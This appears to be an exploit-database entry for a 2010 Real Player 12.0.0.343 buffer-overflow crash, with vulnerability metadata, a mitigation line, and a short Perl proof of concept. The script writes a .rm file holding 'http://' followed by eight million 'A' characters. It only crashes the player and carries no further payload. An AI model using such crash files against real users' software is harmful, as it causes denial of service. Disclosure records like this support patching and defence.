header-logo
Suggest Exploit
vendor:
Real Player
by:
D3V!L FUCKER
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Real Player
Affected Version From: 12.0.0.343
Affected Version To: 12.0.0.343
Patch Exists: YES
Related CWE: N/A
CPE: a:realnetworks:realplayer:12.0.0.343
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

Real Player Local Crash Poc

This exploit is a buffer overflow vulnerability in Real Player version 12.0.0.343. The exploit is triggered by sending a maliciously crafted URL to the application, which causes the application to crash. The URL contains a string of 8000000 'A' characters, which causes the application to crash when it attempts to process the URL.

Mitigation:

Upgrade to the latest version of Real Player, or disable the application if it is not needed.
Source

Exploit-DB raw data:

#!/user/bin/perl
# Exploit Title: [Real Player Local Crash Poc]
# Date: [2010/01/09]
# Author: [D3V!L FUCKER]
# Software Link: [http://www.real.com]
# Version: [12.0.0.343]
# Tested on: [windows XP sp2]
# Code :


$boom="http://"."A" x 8000000;

open(myfile,'>>Crash.rm') || die "Cannot Creat file\n\n";
print myfile $boom;
print "Done..!~#\n";